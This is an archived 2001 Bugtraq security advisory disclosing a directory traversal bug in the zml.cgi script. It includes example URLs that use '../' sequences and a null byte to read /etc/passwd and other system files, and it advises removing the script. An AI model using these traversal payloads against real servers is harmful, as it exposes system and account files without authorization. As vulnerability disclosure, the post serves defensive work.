[23659] in bugtraq
blackshell2: zml.cgi remote exploit
daemon@ATHENA.MIT.EDU (blackshell@hushmail.com)
Mon Dec 31 11:43:13 2001
Message-Id: <200112310804.fBV84Ki18990@mailserver2a.hushmail.com>
From: blackshell@hushmail.com
To: bugtraq@securityfocus.com
Cc: vuln-dev@hotmail.com, vulnwatch@vulnwatch.org
Date: Mon, 31 Dec 2001 00:04:20 -0800
-----BEGIN PGP SIGNED MESSAGE-----
#####################################################
#--blackshell security advisory no2--# #
#--zml.cgi remote exploit--# #
#####################################################
########################
vendor details & history
########################
zml.cgi for webservers
by jero.cc
http://www.jero.cc/zml/zml.html
##################
details of exploit
##################
this is a classic CGI bug which uses ../../../../ to read remote files.
example:
http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00
http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/fstab%00
http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00
this may be used by the attacker to gather vital details about the remote server.
###
fix
###
remote this script from your webserver
####
note
####
this test was conducted on apache box, and a redhat server.
under no circumstances are we liable for any misuse of this
information
########
hi's to:
########
blackshell dev team, #!blackshell contributors and anyone who
over the years has helped us make us what we are
#######
contact
#######
blackshell@hushmail.com
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wl8EARECAB8FAjwwHhcYHGJsYWNrc2hlbGxAaHVzaG1haWwuY29tAAoJED2VGGGCU8ut
bHgAn28OCJjLmUCrk+sePY5ukAfYfopJAJ0Y54Te+w7HIVwXeUdSGt1PmPuTAA==
=yPg1
-----END PGP SIGNATURE-----
